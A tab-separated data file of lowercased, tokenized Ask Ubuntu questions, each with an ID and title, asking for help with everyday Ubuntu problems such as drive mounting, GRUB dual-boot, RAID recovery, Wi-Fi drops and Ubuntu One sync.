64013	move store on u1 android music app	on the samsung galaxy s2 , there is an internal sd storage mounted as /sdcard , and the external sd is mounted to /sdcard/usbstore . is it possible to run the ubuntu one music app on /sdcard/usbstore/subsonic rather than /sdcard/subsonic ?
64016	access workstations without public ip - maybe with vpn	my friend told me , that without public ip of the workstations , i can access machines remotely . but i 'm a rather confused in using vpn , i do n't understand how can it manage to connect . i saw this video about vpn 's mechanism , but he did n't mentioned building them . the situation is : i have an office , with its workstations . sure , the computers are connected to the internet . i have computers at home , and my other working places with internet access . how can i access the office machines with vpn without server with public ip from everywhere ? can you show me a complete tutorial ? ( i saw teamviewer , hamachi , but if it possible , i want to use a private vpn . ) thank you very much !
64022	ubuntu freezes when attaching external hard drive due to hard drive mount mismatch . is there a solution to fix it ?	ok i think i understand why my ubuntu 10.10 freezes when pluggin in an external hard drive through usb . first of all i have to mention that my ubuntu is installed on another 160gb external hard drive . during the installation it was mounted as /dev/sdc /dev/sda = primary laptop hard disk with windows 7 /dev/sdb = 4gb usb flash drive used to install ubuntu 10.10 /dev/sdc = my external hard drive where ubuntu had been installed after performing a system update and restarting computer , i 've received an error message that ubuntu is unable to mount : /boot , / , /home , /windows partitions . i immediately googled the problem and seems i was n't the only one with this issue . i 've solved the problem by editing /etc/fstab ( i do n't remembered the exact filename ) during the startup console before ubuntu is loaded . i have changed long uuid strings to /dev/sdb/ for all 5 of my partitions . the reason for /dev/sdb is because that was the actual mount showing by typing sudo blkud ( again , please edit this post if i have mispelled some commands , as i do n't remember exactly what was it called ; it shows you the current mount points for every partition that is connected to the computer ) . now whenever i connect my backup external hard drive while ubuntu is loaded , the system just freezes . if i connect it before ubuntu loads , it gives me that same error message i firs received after doing system update , because now this backup hard drive is pointing to /dev/sdb and my ubuntu external hard drive is pointing to /dev/sdc , while my /etc/fstab file still says that my ubuntu partitions are on /dev/sdb . so is there any workaround to that ? what should i do ?
64024	i have just installed ubuntu and i cant install any apps	i have just installed ubuntu onto my laptop as a separate partition to my windows drive . everything went fine and all updates were installed . then i went into the software centre and i ca n't install any apps it gives me package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . but nothing else is installing and i cant install any app on the software centre any help will be appreciated . i have had a good look around google and couldnt find anything that worked .
64032	installation of google-chrome overrides preferences for 'default browser '	after i 've installed google-chrome ( not chromium ) , i noticed that it completely overwrote any behaviour set for the default browser , thus resulting in any link clicked in the gnome environment being opened in chrome , instead of my actual default browser , firefox . just about any browser i know , including opera , midori , rekonq , dillo , icecat ( and a bunch of others ) honor the 'default browser ' settings , without screwing around with global .desktop files . even after manually searching for everything possibly related in gconf-editor , i was not able to get rid of this behaviour , and restore firefox as the default browser , so help is very much appreciated . ps : please spare me your `` why do n't you just switch to chrome instead ? '' - i have my reasons , and this is certainly not the place to discuss them !
64033	mplayer ca n't play audio from cron while ncmpcpp is playing simultaneously	i have set up a script , which executes an mplayer command , in order to play audio in crontab . it will be executed in a special set time , but this script can not play audio when ncmpcpp ( a front-end for mpd , aka . music player daemon ) is playing music . but this script can play audio when i execute it from terminal like this : sh bin/alarm.sh i try to get output from either crontab or script , but to no avail . i guess some setting in ncmpcpp or mplayer is wrong , or mpd is using same daemon with crontab 's daemon . anyway , i can not find out the solution . if you know , please help me .
64037	red filter for screen	if i 'm stargazing or just working at night , i 'd like to be able to dim the laptop screen and filter to red . i can dim the screen , but it is still quite bright . what can i do on ubuntu to do this ? ( settings or software . )
64038	why am i unable to remove the ubuntu one icon ?	i have removed the ubuntu one icon from the unity launcher and it keeps returning . i right click the icon and uncheck the 'keep in launcher ' option . i do not use this service and i want to remove it permantly from my launcher .
64039	how do i manage my ubuntu one music store account , specifically change my email address ?	i 've changed email addresses and would like to update my ubuntu one music store account . the receipts for purchases are going to the wrong address . i ca n't seem to find a place to make this change .
64043	displaying program icons in the title bar and task bar	i 'm a brand new , first-time ubuntu user , so any suggestions or info requests will need to be very specific and step-by-step . i 'm not afraid of the terminal or anything else ; i just do n't usually know what to do without being explicitly told . i have the 64-bit version of 11.04 , from the alternate installer , and am dual-booting with windows 7 . i 'm using the 'ubuntu classic ( no effects ) ' desktop option . that said ... manually installed ( from tar.bz2 , as opposed to .deb/synaptic ) programs ( or possibly only manually installed mozilla programs ; i have n't tested other programs ) do n't seem to display their icons in the title bar , nor in the task bar . an icon is shown , but it 's only the default 'there is no icon ' one . currently , i 'm having this problem with seamonkey and thunderbird . seamonkey was originally installed through synaptic ( i ca n't remember if the icon showed then , but i do n't believe it did . ) , then later uninstalled so i could manually install a non-buggy version , and has since been upgraded to the current 2.4.1 . thunderbird was manually installed from the start , first the most recent version , then later downgraded to an older version . since then , i have manually installed several versions , including the same one available through synaptic , and also installed thunderbird through synaptic . currently , i have both the synaptic and a fairly recent 6.something version installed , in different locations . only the synaptic install shows the thunderbird icon . none of the other versions ever have , whether newer or older , so it 's clearly not a version issue . after some time spent with google , i found /chrome/icons/default in each program 's folder , and all the necessary window icons seem to be there , but it does n't look like the programs can find them . why not ? how can i fix this ?
64046	will i have to install those kde libraries if i want to run some apps written in qt ?	i do n't know much about qt and gtk+ , but i 've heard that qt is for kde and gtk+ is for gnome . now i 'm using gnome and i want to use a c++ ide . it 's said that qt creator is a nice choice for c++ development so i decide to have a try . but i 'm really worried about the incompatibility between qt and gnome . besides , i 'm wondering whether it 's normal to use qt creator in gnome developing apps using gtk+ or not . and , qt and gtk+ , which one is better for a ubuntu user ?
64051	internet connection with static ip	i have installed ubuntu server 11.04 edition ( with lamp , mail server , and ssh server ) and i try to connect to the internet . when i plug the cable from my isp with the configuration provided below to a router and then back to my server the connection works fine , but when i try to put the cable directly to my server without the router , with the same information configuration the internet connection does n't work any more . resolv.conf nameserver 81.180.166.1 eth0 link encap : ethernet hwaddr 00:12:79 : a5:0b:39 inet addr:81.180.166.151 bcast:81.180.167.255 mask:255.255.254.0 inet6 addr : fe80 : :212:79ff : fea5 : b39/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5697 errors:0 dropped:1854 overruns:0 frame:0 tx packets 34 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:467192 tx bytes:2594 interrupt:25 in /etc/network/interfaces : auto eth0 iface eth0 inet static ip:81.180.166.151 subnetmask:255.255.254.0 gateway:81.180.166.1 dns : 193.230.240.16 mac:00 0e a6 41 c6 38 .
64056	does ubuntu generally support hdmi out ?	i 'm planning to buy a new lcd tv with full hd and with hdmi inputs . my laptop ( acer 5740 ) has hdmi output , but will ubuntu support it ?
64060	ca n't ssh or ftp into the server with new user accounts ?	i have a mediatemple web server configured with nginx . at first , i created one user account and used that user to log into to the server through ssh ... it worked perfectly and still i can use that user account to login to the server . but , when i create a new user account now , that account ca n't connect to the server ! when i try to connect with ssh , after i give the user name and password the connection gets closed automatically ! when i try to ftp into the site through filezilla ( using that user account ) it says : command : list error : connection timed out error : failed to retrieve directory listing
64063	connect remote via putty	how to connect with putty to a ubuntu 11.04 server which is connected to the internet through a router configured with static specifications ? i have ssh server installed , and when i try to connect from my windows with putty to my remote server i get network error : connection timed out .
64065	3.41gb truecrypt file not syncing on ubuntu one	i am unable to sync a 3.41gb .tc ( truecrypt ) file using ubuntu one . it keeps saying 0 % used , 0bytes of 5gib and file sync is up-to-date how do i sync this file to ubuntu-one ?
64066	how to install spark 2.6.3 ?	i tried downloading the zip file but i could n't find any binary or install file . is it available via apt or can we access the latest .deb file somehow ? edit uname -a linux xxxx 2.6.38-11-generic # 50-ubuntu smp mon sep 12 21:17:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux
64068	how would i create a tar without using sudo ?	if i tar my /home/username and create the .tar file in /home/username , then i get an error of the sort . file changed as we read it probably because the directory file itself is changing due to the creation of the .tar file . of course i could have the file created one level up in /home but that would require sudo or a login . i want to archive and restore without sudo and a re-login . i do n't want to nest the .tar file deep somewhere in /home/username that is less convenient and i suspect that might not even solve the problem .
64072	how do i fix an invalid jdownloader jar ?	i tried installing jdownloader using apt-get , but the installation was interrupted by power failure . since then i 've been trying to reinstall but it gives an `` invalid jar file jdupdate.jar '' error . installation reports as successful but still gives the same error . i originally installed with these commands : sudo add-apt-repository ppa : jd-team/jdownloader sudo apt-get update sudo apt-get install jdownloader
64073	ca n't shut down or restart while others are logged in	when i 'm logged in on my own account and try to do restart or shutdown from the `` power '' menu , while others are also logged in , all that happens is that i get logged out . everyone else stays logged in and the computer does not shut down . if i try to then do `` shutdown '' or `` restart '' from the login screen , nothing happens . in case it matters , in users settings , my account type is `` administrator '' , but everyone else is `` desktop user '' .
64076	year 2103 problem in brasero	i 'm evaluating brasero to find a replacement for cd/dvd creator which has a terrible user interface . when i burn my tar file to a brasero `` data project '' the program seems to create a deliberately ambiguous date in a directory name . for example the directory is called `` data disc ( 03 oct 11 ) '' . how can i burn my tar file without having it go into a dvd directory ? edit @ brunopereira81 says that there is no actual dvd directory being created and he is correct . however , gnome and nautilus will see a linux path containing the ambiguous name even though that name is not a dvd directory . as was suggested it is some sort of mount point . i think it is a virtual device name that appears to browse like a linux directory .
64078	shutdown gets stuck	i am using ubuntu 11.04 , with unity . it 's an `` inside windows '' installation using wubi , and i 've installed on an external usb-hdd . more and more now , my computer does not shut down properly . it gets stuck on a final black screen , where i can do nothing but do a hard shutdown ( press and hold power switch ) . this is rather painful , as i do recall someone saying that linux is more sensitive to that than windows . before , it has always worked anyway , no harm , no foul , but today when i booted up , the graphics are different ( worse ) , and i am in gnome , not unity . ( weird ! ) i never used gnome , so i am assuming it is falling back on some default safe-mode . i 've tried the grub startup option labelled `` ( recovery mode ) '' before , and that seems to do something , but it does not seem to have fixed the problem . sometimes , it seems as though it is the uptime that is the culprit , the longer , the worse it is . also , but it may be unrelated , from the very first time i installed ubuntu , i 've had some problems with the boot . it goes through windows bootloader , then says something like `` error : prefix not found '' , goes to grub , where it says `` error : file not found // error : you need to load the kernel first '' . pressing enter again too fast gives another error , but if you give it 1-2 seconds , then press , ubuntu boots as normal . i have assumed it is because this external hdd is external , perhaps it is slower , needs a nudge , etc . but it may be related to the problem , who knows . update : specs as requested in comment . running windows xp/ubuntu 11.04 on a laptop ( 3-4 years old ) : intel core2duo t9300 2.5ghz 800/6m box 2 x kingston 2gb 667mhz ddr2 non-ecc cl5 sodimm chipset intel gm965 processor intel速 core 2 graphics card nvidia geforce go 8600m gt graphics card memory ( max ) 512 mb
64079	why ca n't i sync a folder from another partition/drive on windows ?	i 'm setting up ubuntu one on my widows machine and i get a message telling me to select a folder in my c : \users\tj directory . i keep nothing on my c : drive and i need to sync from a d : drive directory . how do i sync a directory located on another partition with ubuntu one ?
64082	google-mock ppa	i am looking for an up to date version of google-mocks since 1.4 is no longer supported and has a show stopper bug using icc . so , does anyone know of a ppa ? my google search skills did not show anything .
64086	how can i change or install screensavers ?	i want to change the default screen saver in ubuntu 11.10/12.04 . on 11.04 i just did a sudo apt-get install xscreensaver-data-extra xscreensaver-screensaver-bsod and then i could change it in the control center - > screen saver options . now there seems to be no other option to change the default screen saver .
64089	can i somehow record my screen with whatever sound coming out from speakers ?	i am watching a lecture conducted on adobe breeze . i find it too slow ... usually when i watch videos ( esp lectures ) , i speed up the playback with vlc . saves time so how would you somehow convert/record the breeze presentation as a movie/video ? great if i could work with my computer as usual without affecting the recording . else i could just leave the recording on when i 'm not using
64090	how do i get an lg lic-300 webcam working ?	i use ubuntu 10.04lts from the beginning , and throughout that time the only thing that could not succeed was that this webcam is recognized but not working : bus 005 device 002 : id 0c45:60fc microdia pc camera with mic ( sn9c105 ) i use ubuntu 10.04lts 32bits and the kernel is 2.6.32-32-generic-pae . as i 've been reading recently , which could for the kernel , a new search and i did not find any documentation that satisfactory . in http : //mxhaard.free.fr/spca5xx.html - appears as the webcam support test and driver : spca5xx/le - just bought this webcam to work on linux , taking the version 9.04 on all other it worked , but now 10.04lts repeats in the case of ubuntu 9.04 .
64093	how do i diagnose an onboard wired network interface that quit working ?	i have an installation of 10.10 that has been working fine since i upgraded . one day i booted it and there was no network connectivity . the network indicator now says `` networking disabled '' . if i go to system > administration > network tools > devices the loopback is the default and though eth0 shows up , if i select it everything is blank in the configuration and there is nothing in the interface statistics . lspci shows intel corporation n10/ich 7 family lan controller ( rev 01 ) i have another card handy but would like to learn how to diagnose things like this . for example is there a software reason that a working card would just stop working ? can the card be so visible but be totally broken ? what steps can i try to `` enable '' the card and networking or is there something that would point to hardware right off ? update : it is now working but i would accept the best explanation that might help someone else of why it is working or why i 'm still in trouble . originally the only thing that showed up in the network indicator was the disabled text and there was no `` enable networking '' . based on another post i tried sudo dhclient eth0 though i have no idea what it does . it returned an ip address and i could browse to specific local ips . then i rebooted to see what would happen and i had the same original problem so i did dhclient again but this time noticed that `` enable networking '' was now showing up in the indicator so i checked it . this time i rebooted and everything is working fine . but i still do n't know why it stopped or why the steps i took worked .
64095	change xampp 's htdocs web root folder to another one	i 'm trying to change the xampp 's web root default directory /opt/lampp/htocs to another one like /home/me/dropbox/public_html without success . i 've edited the file /opt/lampp/etc/httpd.conf # old line : documentroot `` /opt/lampp/htdocs '' documentroot `` /home/me/dropbox/public_html '' # ... etc ... # old line : < directory `` /opt/lampp/htdocs '' > < directory `` /home/me/dropbox/work/public_html '' > # # possible values for the options directive are `` none '' , `` all '' , # or any combination of : # indexes includes followsymlinks symlinksifownermatch execcgi multiviews # etc ... i 've did this as said in this article : using ubuntu one to synchronise htdocs ? then i 've restarted apache and i 've got a permission error 403 on every page i 've called with the web browser . so i 've changed folder and files permission to 755 . i 've did this as said in this article : what file permissions should i set on web root ? the problem still remains the same , i have the 403 error on every page i try to reach with the web browser . i have the same problem on a mac using xampp . so everythig works fine if the folder remains the original /opt/lampp/htocs . how can i change it correctly ?
64101	desktop background `` freezes '' in ubuntu 11.04	i 'm experiencing an odd problem with my desktop , which i 'm unable to find any solutions ( or reproduces ) on the web , partly because for any search terms i can think of , i come up with a lot of hits that do n't relate to my problem ... the problem i 'm seeing is that the desktop `` freezes '' , so that what was shown on the desktop before is `` left there '' until something else is placed on top of it . i realize this explanation is n't perfect , so please see the screenshot below . i 'm running ubuntu 11.04 on an asus n53 , and have followed most of the advice here , but without success . i do n't even know where to start troubleshooting .
64102	how do i fix upnp port forwarding on ubuntu using miniupnp ?	from what i understand , transmission bittorrent client uses the miniupnp library to do it 's upnp port forwarding of routers , however on ubuntu upnpc ( a test client of the miniupnp library ) does n't find any idg routers , while on another windows machine on the same networks it works correctly ( with the windows binary of upnpc ) . from what testing i 've done , it seems that the m-search ssdp packet is not being sent onto the network , perhaps a firewall or something is stopping it . how do i try and make sure these packets get though and this works ?
64103	system beeps on shutdown	very recently a couple of our systems have started making beeps on shutdown , we 've not been able to isolate the exact time that they 've been updated and it 's occuring , but i 've narrowed it down to being not pcspkr or snd_pcsp as both are blacklisted under modprobe , and rmmod'ed just to be sure . now i 'm a bit puzzled as i was under the impression those were the only two modules that could make the beep , is there a third lurking that i need to blacklist ? edit : i 've copied the results of lsmod over on pastebin .
64104	lost wifi connection since i connected ethernet cable	i 've had trouble at my office using wifi . the thing is , the wifi network is totally seperate from the office lan , and i 've got to be on wifi if i want to use protocols like ssh or git . i configured the wifi router to have a permanent dhcp lease on my atheros card ( using ath9k driver ) and changed the password encryption to wpa2 ( was using wep before ... a shame ) . also switched to channel 9 , because the area is saturated with ch.11,6,7 ... emitters . all worked fine until i connected the ethernet cable again . now network manager ( on natty 11.04 ) spits this all over my syslog : oct 3 16:24:05 x wpa_supplicant [ 883 ] : trying to associate with { box bssid } ( ssid='xxxxx ' freq=2452 mhz ) oct 3 16:24:05 x networkmanager [ 782 ] : < info > ( wlan0 ) : supplicant connection state : scanning - > associating oct 3 16:24:05 x kernel : [ 9792.310325 ] wlan0 : authenticate with { box bssid } ( try 1 ) oct 3 16:24:05 x kernel : [ 9792.319767 ] wlan0 : authenticated oct 3 16:24:05 x kernel : [ 9792.319802 ] wlan0 : associate with { box bssid } ( try 1 ) oct 3 16:24:05 x wpa_supplicant [ 883 ] : associated with { box bssid } oct 3 16:24:05 x networkmanager [ 782 ] : < info > ( wlan0 ) : supplicant connection state : associating - > associated oct 3 16:24:05 x kernel : [ 9792.343240 ] wlan0 : rx assocresp from { box bssid } ( capab=0x411 status=0 aid=1 ) oct 3 16:24:05 x kernel : [ 9792.343246 ] wlan0 : associated oct 3 16:24:08 x kernel : [ 9795.442339 ] wlan0 : deauthenticated from { box bssid } ( reason : 2 ) oct 3 16:24:08 x wpa_supplicant [ 883 ] : ctrl-event-disconnected bssid= { box bssid } reason=0 oct 3 16:24:08 x networkmanager [ 782 ] : < info > ( wlan0 ) : supplicant connection state : associated - > disconnected oct 3 16:24:08 x kernel : [ 9795.507836 ] cfg80211 : all devices are disconnected , going to restore regulatory settings oct 3 16:24:08 x kernel : [ 9795.507843 ] cfg80211 : restoring regulatory settings oct 3 16:24:08 x kernel : [ 9795.507847 ] cfg80211 : calling crda to update world regulatory domain oct 3 16:24:08 x kernel : [ 9795.512836 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain oct 3 16:24:08 x kernel : [ 9795.512843 ] cfg80211 : world regulatory domain updated : oct 3 16:24:08 x kernel : [ 9795.512845 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) oct 3 16:24:08 x kernel : [ 9795.512849 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 3 16:24:08 x kernel : [ 9795.512852 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) oct 3 16:24:08 x kernel : [ 9795.512855 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) oct 3 16:24:08 x kernel : [ 9795.512858 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 3 16:24:08 x kernel : [ 9795.512860 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 3 16:24:08 x networkmanager [ 782 ] : < info > ( wlan0 ) : supplicant connection state : disconnected - > scanning ... and this goes on and on , trying to reconnect . seems the authentification fails , but i do n't understand why since it worked before i plugged the cable in . any idea ? edit : supressed dhcp permanent lease , works again . still interested about the cause ? !
64106	crashed my server , how do i find out what happened ?	from a remote machine , i ran 100 concurrent requests against my ubuntu vps ab -n 100 -c 100 http : // ... and , as i suspected , the server `` crashed '' . i can still ping it , and it responds very quickly ( ~50ms ) . but i ca n't ssh into it or reach the web-server . i ran 1000 requests with 10 concurrent before , and it responded quickly and reliably , running at about 80 requests per second . fast forward five minutes and i can log in , the web server works great , everything is perfect again . uptime tells me the load_average is 0.06 , 0.04 , 0.05 , and i have a quarter gigabyte of memory left free ( out of 512mb ) . running netstat -n gives me lots and lots of lines like these : tcp 0 0 127.0.0.1:9311 127.0.0.1:35030 time_wait tcp 0 0 127.0.0.1:5984 127.0.0.1:54384 time_wait tcp 0 0 127.0.0.1:9311 127.0.0.1:35024 time_wait the server is running nginx as a reverse proxy , with a handful of cherrypy servers behind it . these servers run on ports between 8000 and 9000 , and they listen only to 127.0.0.1 . 100 concurrent requests does n't seem much to me , even though this is the absolute minimum spec server offered by my hosting company . how do i go about investigating what happend when the server crashed ? the server did n't reboot after the crash . there were no messages written to my kern.log , and there 's no firewall in front of the server .
64107	how can i change my mic-in in port	i am having problem with my mic-in port . can i change my mic-in port to line-in port so that if i connect my microphone to line-in port it will receive voice ? in windows , if i connect any speaker or microphone a window pop-up and ask me what type of device i have connected to that port . is there any way to do this on ubuntu so that i can use line-in port of my pc as microphone in . thanks in advanced and sorry for the bad english .
64109	including application crons	i have 5 web applications . the directory structure is similar to following : /var `- /www `- /domains `- /domain1 `- /public_html `- /crontabs `- /crons `- /domain2 `- /public_html `- /crontabs `- /crons `- /domain3 `- /public_html `- /crontabs `- /crons . . . . . each application has its own list of crons [ and these files contain valid , crontab -e like , syntax ] . at the moment as this is a test and isolated server so all applications run under the same user . i know about crons , /etc/cron.d , /etc/cron.interval ( interval = hourly|daily|weekly ) , /var/spool/crontabs/ . my question : is there an alternate to /etc/cron.d but user specific where i could just symlink these crons and they would be executed ? i would prefer such a solution because these crons get updated at times from developers . on # ubuntu ikonia suggested to google on how could one include crons , i did and could n't find such a solution . if there could be place where i could do : include /var/www/domains/*/public_html/crontabs/crons that would be totally awesome . [ edit ] i am open to changing the crons files a little .
64118	why is 'gedit ' going back to default tab sizes all the time ?	everytime i open a file in gedit , i have to change again the tab with from 8 to 4 , as i prefer it . is there any configuration file where i can make 4 the default tab width ?
64119	restore deleted files ubuntu one	i have accidentally deleted all my files on my one account two days ago . i can still see them in https : //edge.one.ubuntu.com/files/trash/root/ but when i click restore , the service is down . will i ever be able to get my files back , or is there another way to restore them . thanks .
64124	forced-quit sun jdk installation through terminal	i downloaded the package and went through the installation process . i was first prompted with the license . there was an unclickable button which , as the tutorial said , i had to click . so i closed the terminal , relogged and tried writing the same apt-get command , the result was : sam @ ubuntu : ~ $ sudo apt-get install sun-java6-jdk [ sudo ] password for sam : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? how do i continue the process and , well this is embarrassing , how do i `` approve '' the license ?
64128	how do i embed a terminal on the desktop ?	i 've tried the tutorials that i 've found via google search , but none of them seem to work on 11.04 . anyone know how it 's done ? thanks !
64133	video4linux recording and viewing at same time	i need an application for recording a video , while simultaneously viewing it , from my tv capture card . i 've tried tvtime , but it does n't support recording . xawtv works , just about but often crashes or refuses to record . any other suggestions ?
64135	clementine current song as empathy status	any plugin available to set clementine 's current playing song as empathy status [ update ] i 've tried it and was not succesful , here is my problem http : //stackoverflow.com/questions/7671763/error-setting-status-to-empathy-with-dbus/7760194 # 7760194 but i 've figured out that it is not possible to set status of empathy through dbus http : //telepathy.freedesktop.org/spec/connection_interface_simple_presence.html # method : setpresence regards [ update ] answer found on stack overflow link given above http : //stackoverflow.com/questions/7671763/error-setting-status-to-empathy-with-dbus/8160857 # 8160857
64144	how can i change the priority of a launchpad ppa ?	i 'm using ubuntu 10.04 lts on my server and want to install netatalk 2.2 . there is a version available in the ppa of stefano rivera . now it happens that i 've also got smartmontools installed for which he supplies a new version as well , but i 'd really like to only upgrade netatalk . i 've tried adding the file /etc/apt/preferences.d/stefanor : package : * pin : o=lp-ppa-stefanor pin-priority : 50 but this has n't changed anything . how can i depriorize a repository and install just one piece of software from it ?
64147	what is the default file system ?	i am presuming that at this late stage in development , the default file system of 11.10 will not change from now until final release . will it be ext4 , and if/when it changes , how will systems on the old format upgrade , in their current state , or changing the entire parition ?
64153	connecting to a secure webdav server through https	i 'm trying to connect to a secure webdav server but i keep getting the error `` org.freedesktop.dbus.error.noreply '' dbus error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . how can i check the security policy or furthur diagnose the problem ? i am connected through windows machines .
64154	slow keyboard on an acer aspire 5253	i 've had ubuntu 11.04 installed on my acer aspire 5253 ( 64 bit ) for about a month . this afternoon , it started taking about a second to recognize keystrokes . to do a key combination , i have to hold each key down for a second before pressing the next key for it to recognize it . i rebooted a few times , and it 's still happening . the problem only starts after i 've logged in , and does n't occur if i log in under a new account . i have n't made any changes to the system recently , and all i 've done is web browse all day today . cpu and memory usage are perfectly normal , and everything else about the system still runs nice and snappy . i 've seen a number of forum posts about problems like this , especially on 64 bit systems , but they all appear right away , while this took over a month to turn up . any ideas what might be causing this ?
64155	hamster time tracker broken after upgrade to 11.10	after upgrading 11.04 to 11.10 ( which was rather bumpy because of a failure with the flash-installer ) , i ca n't seem to start hamster-time-tracker . output : user @ machine : ~ $ hamster-time-tracker traceback ( most recent call last ) : file `` /usr/bin/hamster-time-tracker '' , line 478 , in < module > from hamster import i18n importerror : can not import name i18n does anyone have any tips on where to start with this issue ?
64156	how do i repair my software raid5 disks ?	i accidentally unplugged my esata cable while rerouting some cables behind my desk and knocked my raid array offline . i believe the drives are fine , but they show up as state `` removed '' now , how can i reinitialize the array ? mdadm -- detail /dev/md1 shows : /dev/md1 : version : 00.90 creation time : wed oct 20 20:00:41 2010 raid level : raid5 array size : 5860543488 ( 5589.05 gib 6001.20 gb ) used dev size : 1953514496 ( 1863.02 gib 2000.40 gb ) raid devices : 4 total devices : 4 preferred minor : 1 persistence : superblock is persistent update time : mon oct 3 18:39:41 2011 state : clean , degraded active devices : 0 working devices : 0 failed devices : 4 spare devices : 0 layout : left-symmetric chunk size : 64k number major minor raiddevice state 0 0 0 0 removed 1 0 0 1 removed 2 0 0 2 removed 3 0 0 3 removed 4 8 32 - faulty spare 5 8 48 - faulty spare 6 8 16 - faulty spare 7 8 64 - faulty spare and here 's mdstat : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md1 : active raid5 sdc [ 4 ] ( f ) sdd [ 5 ] ( f ) sdb [ 6 ] ( f ) sde [ 7 ] ( f ) 5860543488 blocks level 5 , 64k chunk , algorithm 2 [ 4/0 ] [ ____ ] unused devices : < none >
64157	can i tag photos in digikam using only the keyboard ?	ideally i want to hit a key combo and start typing the name of a tag while a dialog box shows a list of matching tags i can select from ( a bit like the tag box when you ask a question on this site : ) . using a mouse makes it quite a bit slower when working through lots of photos ... and i am aware that in digikam 2.x i can apply a keyboard shortcut to a single tag , but that does n't really do what i want . it just applies that tag to the currently selected photos - i ca n't just type and search in the subfolders .
64158	how do i restore triple tap to emulate the middle click ?	i 've upgraded from 11.04 to 11.10 but the ability to tap with three fingers on the touchpad to achieve a middle mouse click has disappeared . when a mouse is plugged in the middle button click works exactly as expected . i 've tried similar approaches to : swapping the double and triple finger tap actions on trackpad and using $ gsettings set org.gnome.settings-daemon.peripherals.mouse middle-button-enabled true but still nothing works . i 'm using an asus ul-30a which is typically well supported under linux . i 'm using gnome-shell but the problem also occurs when using unity . could anyone advise how to fix the triple tap please ? edit : i 've also tried installing the kde package synaptiks and setting the button functions and this also has no effect
64163	where are java jdk sources ?	i installed java jdk but where can i find the sources ? for one my homework , i 'm asked to refer to one of the files ... check the source code of java.util.linkedlist . the java source code of this class can be found in the jdk package
64164	flash player in epiphany	i have installed epiphany browser , and really like it because of it 's startup time and small footprint . however , i am unable to make youtube or huhu videos ( anything that requires flash ) to run on epiphany . can you please help me with the configuration . i have firefox and opera both on my system , and both are able to play flash based videos on the web .
64165	is there a reason why previous conversation is not shown in empathy ?	i use google talk ( chat ) in gmail , google plus , empathy , and on my android phone . all but empathy show the messages made in any of the others making it easy to move between my phone and gmail without having to check what it was i was talking about . is there a reason empathy can not or does not do this ?
64167	ca n't right-click on gnome-shell panel to add extension	problem i 've upgraded to 11.10 today , and have been toying with gnome-shell extensions - gnome-shell version 3.2.0 . when it comes to add one to the top panel , i have hit a brick wall . right-clicking on the panel does nothing . am i doing something wrong - is one supposed to add extensions to the top panel by some other method ? tried '' installing '' an extension holding alt while right-clicking on top panel
64170	how can i add an item to the kde application launcher menu using the command line ?	i 've added a file /etc/xdg/menus/applications-merged/foo.menu and the stuff in foo.menu all works in gnome . but the menu items did n't show up , even after rebooting . i then tried adding a menu item `` bogusmenu '' using kmenuedit . after hitting save in kmenuedit , bogusmenu appeared , and the menu item associated with foo.menu also showed up ! so what 's kmenuedit 's secret updater code doing , and how can i call it from command line ( specifically , an installation script ) ? this is in linux educacional 4 , which is based on ubuntu 10.04 with kde 4.4.5 . some things which have n't worked : using xdg-desktop-menu , touching the files in /etc/xdg/menus , running kbuildsycoca .
64171	how do i mv or cp a *.u1conflict file	ubuntu one is putting files in conflict while i 'm working on them . the original file is gone and only the conflict file remains . to make matters worse , i ca n't mv , cp the file to the original name . if i delete the conflict file i 'm unable to create a new file with the original name . how do i rename the file , and how do i prevent u1 from messing with my files that are in use ?
64172	problem with grub to dual-boot in raid system	i 've got two hds in a raid system and windows 7 installed in a partition . when i try to install ubuntu in the other partition , the installer says the bootloader ca n't be installed . i 've mounted windows partition and installed grub on it , but i 'm not able to configure it 's menu . when i start the computer , it gets to the standard grub terminal ( does n't show the options to boot ) . as i installed grub in the windows partition , i have unsuccessfully tried to use c : /boot/grub/menu.lst and c : /boot/grub/grub.conf . in a few words , i can install both windows and ubuntu in the raid system and install grub , but i ca n't configure grub to boot them ( grub menu ) . maybe the answer is here , but i ca n't figure it out . please , help me . i appreciate it .
64177	where has the 'shut down ' option gone ?	i ca n't find the 'shut down ' option anywhere ...
64178	why is sudo -s better than sudo su ?	iâve seen many comments here in ask ubuntu regarding preference in using sudo -s rather than sudo su . for me , that two commands do exactly the same . but why is sudo -s supposed to be better ?
64180	are there any fax sending applications ?	are there any fax sending application written for ubuntu . if yes how can i configure and install on ubuntu 64 bit machine . uname -a linux xxxxx 2.6.38-11-generic # 50-ubuntu smp mon sep 12 21:17:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux updates : i found couple of them , hylafax-client mgetty-fax
64181	how do i disable auto-away for online presence ?	i am using natty with with classic gnome desktop . i use empathy and sometimes skype . both these get the online state from the system itself somehow . if i do n't touch my keyboard for a few minutes - even when watching a youtube clip or something - the inactivity triggers an auto-away state on my messaging apps . it 's synchronized so i imagine its coming coordinated from the system , and not the two apps making the same decision individually . how can i disable this ? i want manual control - i 'm only away when i set it to away in a messaging app .
